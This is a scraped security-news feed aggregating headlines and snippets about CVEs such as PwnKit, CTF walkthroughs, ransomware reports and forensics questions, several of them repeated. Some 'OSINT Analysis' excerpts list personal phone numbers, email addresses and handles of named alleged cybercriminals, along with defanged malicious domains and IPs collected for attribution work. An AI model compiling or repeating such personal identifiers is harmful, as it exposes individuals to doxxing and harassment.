    Article URL: https://access.redhat.com/security/vulnerabilities/RHSB-2022-001 Comments URL: https://news.ycombinator.com/item?id=30113422 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
  • Open

    The Importance of Responsible Disclosure
    In my years as a security analyst I have worked with many clients who were in very dire straits. A website compromise is never a pleasant experience but there are a number of cases that stick out in my mind as particularly memorable: The ecommerce website owner whose business was on the brink of disaster after having to pay thousands of dollars in fines to Visa due to the presence of a credit card skimmer. Continue reading The Importance of Responsible Disclosure at Sucuri Blog.
  • Open

    A bunch of movie scripts
    submitted by /u/theg721 [link] [comments]  ( 1 min )
    words
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    horse food
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Russian and European rocket launch videos - Broadcast quality
    http://tvdownload.esa.int/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Magnetometer datasets from various space missions
    https://pds-ppi.igpp.ucla.edu/data/ he Planetary Plasma Interactions (PPI) Node of the Planetary Data System (PDS) archives and distributes digital data related to the study of the interaction between the solar wind and planetary winds with planetary magnetospheres, ionospheres and surfaces. The PPI Node is located at the Department of Earth, Planetary, and Space Sciences at the University of California, Los Angeles (UCLA). submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-28 Review
    CodeQL 提升篇 by ourren 如何入门工控漏洞挖掘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-28 Review
    CodeQL 提升篇 by ourren 如何入门工控漏洞挖掘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    DC系列靶机知识点总结
    本篇文章,主要针对DC系列9个靶机中用到的工具,命令和提权的知识点进行总结。  ( 1 min )
    vulnhub之DC-9靶机渗透详细过程
    非常详细的DC-9打靶过程。  ( 1 min )
    vulnhub之DC-8靶机渗透详细过程
    非常详细的DC-8打靶过程。  ( 1 min )
    vulnhub之DC-7靶机渗透详细过程
    非常详细的DC-7打靶过程笔记。  ( 1 min )
    FreeBuf早报 | 欧盟向WhatsApp下通牒;朝鲜关键服务疑遭DDoS攻击
    欧盟委员会宣布, WhatsApp 必须在一个月内澄清其服务条款和隐私政策最近发生的一些变化,以确保符合欧盟的消费者保护法。  ( 1 min )
    国家网信办发布《互联网信息服务深度合成管理规定(征求意见稿)》
    《意见稿》共计二十五条,明确了对生成合成类算法和利用深度学习、虚拟现实等新技术新应用制作音视频内容等的监管要求,进一步厘清、细化深度合成技术的应用场景,明确深度合成服务提供者和使用者的信息安全义务。
    2022年10款好用免费数据恢复软件分享
    2022年10款好用免费数据恢复软件分享  ( 1 min )
    CVE-2021-4034 Linux Polkit 权限提升漏洞挖掘思路解读
    一文带你了解CVE-2021-4034漏洞的挖掘全过程。  ( 1 min )
  • Open

    Paytm-Broken Link Hijacking
    Hello Everyone…. Continue reading on InfoSec Write-ups »  ( 2 min )
    TEJAS PANCHAL ONE OF THE YOUNGEST CYBER SECURITY EXPERT.
    We welcome increasingly more potent online vulnerabilities as we go into a digitized future with advanced information technology shaping… Continue reading on Medium »  ( 1 min )
    OpenLeverage Partners with Code4rena for Audit Contest to Enhance Security Measures
    Since our inception, OpenLeverage has been committed to developing a permissionless lending and margin trading protocol with aggregated… Continue reading on Medium »  ( 2 min )
  • Open

    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IM Screen Names - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IM screen names: aim:goim?screenname=youngglobeman&message=Hello+Are+you+there? aim:goim?screenname=yeezz0r&message=Hello+Are+you+there? aim:goim?screenname=xkyroutx&message=Hello+Are+you+there? aim:goim?screenname=wisie459&message=Hello+Are+you+there? aim:goim?screenname=whailen&message=Hello+Are+you+there? aim:goim?screenname=wgrumpke&message=Hello+Are+you+there? aim:goim?screenname=verbal0g&message=Hello+Are…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities ICQ UINs - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: 999008 9773639 974763 97254007 95211861 92754913 914506 89531566 8923240 86958674 802820 777726 74623265 7444304 690033 6666666 637321 62527577 598629 59838986 56714884 56327073 5556665 517196 48721062 47564547 4545 44203686 41781 3727374 362563 35 348140 33342322 332163 330332251 327539466 320455282 320100851 319326887 31485639 304060 29457002 288687540 288670074 266472842 26633491 264975608 2482045 236790331 230406 222567486 222409185 22063094 219747908 21386767 213201784 212719246 19457815 193200333 1881621 179251032 178954300 178832228 178420526 178210999 178101166 178020075 177541908 177507739 177394922 177016428 176824746 176531816 175688952 175596058 175521773 175350857 175308348 175157730 174902318 174760817 174537112 174511919 174445299 173846049 173838529 173767788 17359522 173387414 173299970 173254582 173019781 173002204 172674035 172476811 172290141 172252866 172021743 171975533 171805992 1715300002 171468368 171440228 170627352 170324565 170036758 169769760 169243371 169220281 169006693 168834059 168769080 168675160 168595955 168495889 168422846 168413916 167927175 167897380 167636937 167023436 166657595 166581197 166407706 165969755 165638624 165546617 164872312 164165878 164008345 162852265 1601617 158807983 15652907 154866004 152616 150860495 139736678 130915854 11402050 1111111 10966997 107021 105233239 103363810 100631 100161 Stay tuned!
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities Personal Email Address Accounts - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: shadow@shadowcrew[.]com idline@ziplip[.]com vengeance_1@ziplip[.]com cracker81@ziplip[.]com den5013@ziplip[.]com onthefringe@ziplip[.]com midhack@ziplip[.]com toastypimp@yahoo[.]com fakeid@ziplip[.]com anonraider@hotmail[.]com KsnowyInc@ziplip[.]com spookycat911@ziplip[.]com Necromancer01@ziplip[.]com script4dumps@ukr[.]net dominican@ziplip[.]com rcwizard@ziplip[.]com CAYMAN@Veg…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IP Addresses - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IP addresses accounts: 61[.]153[.]225[.]253 61[.]156[.]17[.]164 61[.]159[.]174[.]31 216[.]12[.]218[.]213 61[.]172[.]195[.]167 1[.]3[.]5[.]112 61[.]175[.]211[.]198 64[.]82[.]92[.]118 218[.]62[.]16[.]38 61[.]151[.]251[.]199 61[.]158[.]185[.]39 213[.]98[.]75[.]135 5[.]3[.]2[.]34 211[.]147[.]61[.]151 64[.]82[.]91[.]117 212[.]181[.]134[.]31 194[.]226[.]242[.]33 217[.]126[.]111[.]6 61[.]172[.]247[.]85 212[.]57[.]166[…
    The Evolution of Encrypted IM Messenging Platforms - The Rise and Future of the OMEMO Protocol - An Analysis
    Dear blog readers, I've decided to share with everyone an article that I've been recently working on namely the rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the security risks involved in OMEMO type of communications including to offer practical security and privacy recommendation advice which I originally wrote for my ex-employer Armadillo Phone. In a modern and vibrant secure and encrypted mobile device ecosystem facing various hardware and physical security type of threats including the general rise of insecure WiFi hotspots and various other factors including the rise of various nation-state and rogue and malicious advanced persistent threat type of malicious and fraudulent campaigns a new protocol has recently emerged called OMEMO basically lim…
    Exposing a Currently Active Portfolio of Rogue and Fake Tech Support Scam Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of fake and rogue fake tech support scam domains with the idea to assist everyone in their cyber attack attribution efforts. Sample rogue fraudulent and malicious tech support scam domains include: 0120-hfjkahgfu-238[.]cf 1-800-my-apple[.]org 1serversupport[.]com 2serversupport[.]com 3serversupport[.]com 3stepremoval[.]com 4serversupport[.]com 5serversupport[.]com 6serversupport[.]com 7serversupport[.]com 8serversupport[.]com 9inchmonster[.]us 9serversupport[.]com 11serversupport[.]com 22serversupport[.]com 24-7helpline[.]co[.]uk 24hour-apple-support[.]org 24techhelp[.]com 24x7livesolution[.]com 33host[.]net 33serversupport[.]com 44serversupport[.]com 55serversupport[.]com 66serversupport[.]com 77serversupp…
    Profiling FBI's Most Wanted Iran-based Cybercriminals - Mohammad Sagegh Ahmadzadegan - An OSINT Analysis
    In this post I've decided to expose and offer personally identifiable information on Iran's based cybercriminal known as Mohammad Sagegh Ahmadzadegan for the purpose of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Mohammad Sagegh Ahmadzadegan includes: Name: Mohammad Sagegh Ahmadzadegan Handle: Nitrojen26 Email: nitr0jen26@asia[.]com; Nitrojen26@yahoo[.]com; me@sadahm[.]net Web Site: hxxp://sadahm[.]com Social Media Accounts: https://twitter[.]com/nitrojen26 Sample personally identifiable photos of Mohammad Sagegh Ahmadzadegan include: Stay tuned!
    Profing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis
    In this post I've decided to offer in-depth and practical and relevant OSINT analysis of FBI's Most Wanted Cybercriminal Mujtaba Raza from the Forwarderz and SecondEye Solution fake documents and IDs selling Pakistan-based rogue fraudulent and malicious online enterprise with the idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. shy4angels@gmail[.]com shahzadsmb@gmail[.]com khizarh11@yahoo[.]com khizarhayat[.]jaffri@yahoo[.]com muhammadkhizar[.]hayatjaffri@yahoo[.]com mygreentree59@yahoo[.]com khizar14hayat@gmail[.]com muhammadkhizarhayatjaffri@yahoo[.]com threatcc@gmail[.]com mujtaba@forwarderz[.]com syedaliraza940@gmail[.]com raza[.]zaidi92@yahoo[.]com kool_boy92@hotmail[.]com s[.]alirz92@gmail[.]com alimohsin228@gmail[.]com mohsinrazaamiri@gmail[.]com alimohsin228@yahoo[.]com amestypezx@yahoo[.]com mohsin@forwarderz[.]com great_guy1102002@yahoo[.]com support@secondeyesolution[.]com info@forwarderz[.]com forwarderz@yahoo[.]com forwarderzlive@google[.]com forwarderzlive@hotmail[.]com support@secondeyehost[.]com Sample Web sites known to have been used by Forwarderz and  SecondEye Solution:  hxxp://secondeyesolution[.]su hxxp:// secondeyesolution[.]ch hxxp:// secondeyesolution[.]ru hxxp:// secondeyesolution[.]com hxxp:// forwarderz[.]com hxxp:// secondeyehost[.]com Sample screenshots of various Forwarderz and SecondEye Solution domains include: Stay tuned!
    A Peek Inside Today's Modern RATs (Remote Access Tools) and Trojan Horses C&C (Command and Control) Communication Channels - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of RATs (Remote Access Tools) and trojan horses C&C (Command and Control) communication channels including actual currently active names of RATs (Remote Access Tools) and trojan horses wit the idea to assist everyone in their cyber attack and cyber attribution campaigns where the C&C (Command and Control) communications channels which I'll share exclusive rely and use static and dynamic DNS and IP providers for the actual C&C infrastructure which is a common TTP (Tactics Techniques and Procedures) for this type of malicious software releases. Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 include: Casa RAT Back Orifice Bandook RAT Dark Comet Rat Cerberus Cybergate…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio – Part Three – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns[.] Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[…
    Profiling a Currently Active Personal Email Address Portfolio of Members of Iran's Ashiyane Digital Security Team - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active personal email portfolio belonging to members of Iran's  Ashiyane Digital Security Team with the idea to assist everyone in their cyber attack or cyber threat actor attribution campaigns. Sample currently active personal emails known to belong to members of Iran's Ashiyane Digital Security Team: m0stagim@gmail[.]com mtn97[.]hacker@yahoo[.]com si13nt_si13nt@yahoo[.]com midia595@yahoo[.]com Dead[.]Zone@att[.]net n0_sec@yahoo[.]it MagicC0d3r@gmail[.]com Faghat_be_khatere_to6000@yahoo[.]com raminshahkar73@yahoo[.]com nitr0jen26@asia[.]com Lord[.]private@ymail[.]com mehdy007@hotmail[.]fr plus[.]ashiyane@gmail[.]com pashe_kosh9@yahoo[.]com omid[.]ghaffarinia@gmail[.]com Pashekosh8@gmail[.]com pashe_kosh8@yahoo[.]com Sun[.…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part Two – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[.]…
    Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT Analysis
    Dear blog readers,   I've decided to share with everyone a currently active portfolio of rogue and malicious CoolWebSearch IPs with the idea to help everyone in their cyber attack attribution campaign including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: 008i[.]com 008k[.]com 00hq[.]com 010402[.]com 05p[.]com 0calories[.]net 0cat[.]com 0cj[.]net 100gal[.]net 100sexlinks[.]com 101lottery[.]com 1089288654 10money[.]us 123keno[.]com 130[.]94[.]72[.]17 143fuck[.]com 157[.]238[.]62[.]14 171203[.]com 193[.]125[.]201[.]50 195[.]190[.]118[.]140 195[.]225[.]176[.]14 195[.]225[.]176[.]31 195[.]225[.]177[.]13 195[.]225[.]177[.]8 198[.]65[.]164[.]168 198[.]65[.]164[.]170 198[.]65[.]164[.]171 1check[.]us 1cost[.]us 1-domains-…
    Profiling Yaroslav Vasinskyi from the Kaseya Ransomware Attack Campaign - An OSINT Analysis
    It appears that the U.S Justice Department has recently made arrests in the Kaseya ransomware dropping campaign and I've decided to dig a little bit deeper and actually offer and provide the necessary actionable intelligence in the context of exposing the individuals behind these campaigns in the context of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Yaroslav Vasinskyi: Mobile: +380993082660 Phone: 1-800-225-5324 which is actually the phone number of the FBI Personal email address accounts: yarik45@gmail[.]com, yaroslav2468@mail[.]ru Online handles: Yarik45, Yaroslav2468 ICQ: 635995970 including the following Web site which is he known to have been offering around…
  • Open

    Are there any dynamic lists that are maintained to track VPNs egress points like nord or surfshark?
    submitted by /u/krattalak [link] [comments]  ( 1 min )
  • Open

    Targeted Healers: Open Source Analysis of Attacks on Hospitals and Medical Staff in Sudan
    Open source evidence shows how Sudan’s security forces attacked hospitals, medical workers and patients during recent protests in Khartoum Continue reading on Medium »  ( 7 min )
    Try Hack Me’s OhSint:A Walkthrough
    ​Hello readers, welcome to this segment of my blog, as I guide you to solve the OhSint Room, hosted on TryHackMe.This room is a lot of fun! Continue reading on Medium »  ( 2 min )
  • Open

    Anyone done the FLETC forensics courses?
    I'm doing forensics for the military and have an upcoming Digital Evidence Collection in an Enterprise Environment course at FLETC. Since a lot of members of this subreddit are LE, I was wondering if any of you have taken this course and, if so, how was it? submitted by /u/Sandyblanders [link] [comments]  ( 1 min )
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    Full read SSRF via Lark Docs `import as docs` feature
    Lark Technologies disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/1409727 - Bounty: $5000

  • Open

    Certification Question
    I am enrolled in a boot camp for Certified Computer Forensics Examiner/ Certified Mobile Forensics Examiner through InfoSec Institute next week. This was to prepare us for IACRB's certifications CCFE/CMFE. This morning, I noticed that InfoSec pulled the original syllabus, IACRB's website is locked down and have since learned that IACRB is now dissolved. InfoSec says that the certification will be now issued by them instead of IACRB (apparently, IACRB was affiliated with them originally). I know certifications aren't the end-all, be-all (experience is key, I know). But I want to make sure that I am receiving certs from organizations that are trustworthy. I've seen many job postings asking for the CCFE especially. Does this matter at all? Did IACRB's standing show any clout previously and will this now be lost? submitted by /u/FormerFive0 [link] [comments]  ( 2 min )
    Help with a ransomware infected Synology NAS
    Hi all, I recently encountered a Synology NAS with proprietary Synology RAID on both of its 4TB Hdds. I initially intended to acquire both drives and attempt to rebuild the RAID with all possible bit and strip size combinations but realised that it might not be worth it. My objective was to reacquire a readable drive and process the data in AXIOM for timeline, event logs analysis etc. My last resort would be to run the NAS on a simulated network to access the files. But I realise that even then I may not be able to target a network drive to acquire the data. Perhaps only log file analysis by exporting Linux artefacts (bash history, recent files, system logs etc) Would like to seek advise from those who had previously encountered such exhibits and how you managed to retrieve log records. Would running KAPE on a host network pc targeting the network drive or perhaps using a Tsurugi OS machine and linking it to the NAS to run analysis tools be useful here? submitted by /u/Drako880 [link] [comments]  ( 2 min )
    Did Encase support linux/docker forensic
    Which Encase enpack can we get memory of Linux physical machine and docker memory? Which are the Linux forensic artifacts support by Encase besides user login/bash history/process/network info, any Enpack can use? Did Encase provide timeline analysis for linux image/Docker image? submitted by /u/cyberfo [link] [comments]  ( 1 min )
  • Open

    Anyone have a good list of people to follow on twitter for security updates? Preferably ones that have a lot of technical content.
    I know twitter is very good for security news, but a lot of the ones I find are just like news sites that don't tell me much about the technical side of new vulnerabilities, attacks and bugs. I'm interested in pretty much all topics of security. Appsec, mobile sec, threat modelling, anything. If you have lists of people to follow who go into great technical detail, I'd be very grateful! Thanks! submitted by /u/Epsi0 [link] [comments]  ( 1 min )
    what is the best way to cleanse a PC?
    I'm no tech buff so sorry if I'm asking all the wrong questions. but when I was living with family my siblings would test out their spyware hacks on my laptop/phone's I remember on the laptop I could tell when they were trying something because it would start acting funny and on startup or mid session there would be a couple cmd boxes that would appear run something and close out by themselves. recently I'm seeing the same type of things happening mainly on my GF's laptop but we are renting our own apartment so I am a little worried about security. I'm using Avira anti-virus but honestly think these things are a joke. my question is how exactly do you protect against and get rid of attacks like this? I have tried reformatting the drives in the past but that would only last long enough for whatever i deleted to redownload then ill be having the same symptoms all over again. sorry for the broad description like i said I'm not that tech savvy but thanks for you guys time and hopefully can point me in the right direction. much appreciated! submitted by /u/Questionable_Qs_2655 [link] [comments]  ( 2 min )
    How does clicking a email link result in installing malware?
    Can someone explain exactly how clicking on a link on a email can install malware on device? submitted by /u/LagunaLoireFF8 [link] [comments]  ( 1 min )
    How do you manage auxiliary AD accounts password expiration ?
    For example, separated admin accounts in an Active Directory without interactive logons (run-as) : you don't get interactive notifications about password expiration for that account... ho do you manage this ? script ? submitted by /u/arnaudluti [link] [comments]  ( 2 min )
    Why should sensitive documents not be sent via Email?
    Why do people advise against sending sensitive documents via Email? submitted by /u/Linux98 [link] [comments]  ( 2 min )
  • Open

    CVE-2021-4034
    Article URL: https://ariadne.space/2022/01/27/cve-2021-4034/ Comments URL: https://news.ycombinator.com/item?id=30105994 Points: 2 # Comments: 0  ( 4 min )
  • Open

    StellarParticle Campaign: Novel Tactics and Techniques | CrowdStrike
    submitted by /u/dmchell [link] [comments]
    Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Technical Analysis of CVE-2022-22583: Bypassing macOS System Integrity Protection (SIP)
    submitted by /u/shleimeleh [link] [comments]
    OSS PwnKit Detector (CVE-2021-4034)
    submitted by /u/SRMish3 [link] [comments]  ( 1 min )
    PwnKit: How to detect privilege escalation using CrowdSec
    submitted by /u/klausagnoletti [link] [comments]
    [New] Configuring Linux AuditD for Threat Detection
    submitted by /u/InH4te [link] [comments]
    How to use FaPro to simulate multiple devices in network
    submitted by /u/ntestoc3 [link] [comments]
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Sleep Attack: Intel Bootguard vulnerability waking from S3 (2021)
    Article URL: https://trmm.net/Sleep_attack/ Comments URL: https://news.ycombinator.com/item?id=30103498 Points: 1 # Comments: 0  ( 10 min )
    Xerox vulnerability to remotely brick network printers
    Article URL: https://neosmart.net/blog/2022/xerox-vulnerability-allows-unauthenticated-network-users-to-remotely-brick-printers/ Comments URL: https://news.ycombinator.com/item?id=30097563 Points: 2 # Comments: 0  ( 8 min )
    Polkit vulnerability was discovered in 2013
    Article URL: https://twitter.com/ryiron/status/1486207182404472832 Comments URL: https://news.ycombinator.com/item?id=30094998 Points: 2 # Comments: 0  ( 1 min )
  • Open

    vulnhub之DC-6靶机渗透详细过程
    非常详细的DC-6靶机渗透过程,仅供大家一起学习、交流。  ( 1 min )
    FreeBuf早报 | Tor项目起诉一俄罗斯法院;英国拟向儿童科普DDoS攻击后果
    英国国家犯罪局(NCA)的网络犯罪部门正在着手进行一项旨在教育儿童了解 DDoS 攻击后果的计划。  ( 1 min )
    美国《提升国家安全、国防和情报系统网络安全备忘录》全文翻译及解读
    本文从发布背景、六大亮点与业界反响三个方面解读美国总统拜登签署的《提升国家安全、国防和情报系统网络安全备忘录》(NSM)。  ( 1 min )
    渗透测试之高效信息搜集(整合)
    几乎每一个学习渗透的安全人员,都会被告知,信息收集是渗透测试的本质,那事实果真如此嘛?  ( 2 min )
    美国政府正式发布零信任战略,拟在2024财年前实现特定目标
    在整个政府范围内启动零信任框架迁移,大幅降低针对联邦政府数字基础设施的网络攻击风险。
    python_mmdt:ssdeep、tlsh、vhash、mmdthash对比(六)
    本文通过400个测试文件的关联性分析对比,对比ssdeep、tlsh、vhash、mmdthash之间的效果差异。  ( 3 min )
    实现CobaltStrike上线短信提醒【没用的技巧又增加了】
    叮,您有新的主机上线,请查收哦!  ( 1 min )
    中央网信办等10部门发布《数字乡村发展行动计划(2022-2025年)》
    《行动计划》围绕发展目标,从8个方面部署了26项重点任务。
    【情报工具】分享24个国内外政府开放数据平台
    开放数据(Open Data),尤其是政府的开放数据(Government Open Data),是一类重要的但仍未被妥善开发利用的庞大资源。  ( 1 min )
    Linux Polkit Root权限提升漏洞(CVE-2021-4034)
    polkit 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。  ( 1 min )
    《Gartner 2022年网络防火墙关键能力报告》发布,Fortinet获得三大用例最高得分
    世界经济论坛预估,2022年全球网络犯罪支出将达到惊人的2.2万亿美元。  ( 1 min )
  • Open

    SecWiki News 2022-01-27 Review
    2021年物联网设备CVE天梯榜 by ourren Flare-On 8th两道题目复现 by ourren 应急响应-Yara规则木马检测 by ourren ISOON2021 线下域渗透题解 by ourren 去中心化上线CS by ourren 漏洞监控平台——Monitor by ourren 聊聊API安全的重要性及治理思路 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-27 Review
    2021年物联网设备CVE天梯榜 by ourren Flare-On 8th两道题目复现 by ourren 应急响应-Yara规则木马检测 by ourren ISOON2021 线下域渗透题解 by ourren 去中心化上线CS by ourren 漏洞监控平台——Monitor by ourren 聊聊API安全的重要性及治理思路 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on InfoSec Write-ups »  ( 4 min )
    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on Medium »  ( 4 min )
    How I was able to get HOF in one of the world’s leading hotel brands by 30 mins of googling.
    Hey Folks! Yash Dharmani (H1GH4T) here, Hope you’re all doing good. Continue reading on Medium »  ( 2 min )
    Tìm những bug trên Symfony
    Cre:How I was able to find multiple vulnerabilities of a Symfony Web Framework web application | by Abid Ahmad | Jan, 2022 | Medium Continue reading on Medium »  ( 1 min )
    Kindle You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Deskripsi Book  Celebrate your little cuddle… Continue reading on Medium »  ( 2 min )
    웁살라시큐리티, Nakji Network와 총 20만 달러 버그 바운티 진행
    Uppsala Security(웁살라시큐리티)는 블록체인 온체인 데이터 인덱싱 프로젝트인 Nakji Network(Nakji Network)와 버그 바운티 프로그램을 함께 합니다. Continue reading on Medium »  ( 2 min )
  • Open

    Threat Assessment: BlackCat Ransomware
    BlackCat ransomware (aka ALPHV) is notable for its use of the Rust programming language and an aggressive approach to naming and shaming victims. The post Threat Assessment: BlackCat Ransomware appeared first on Unit42.
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
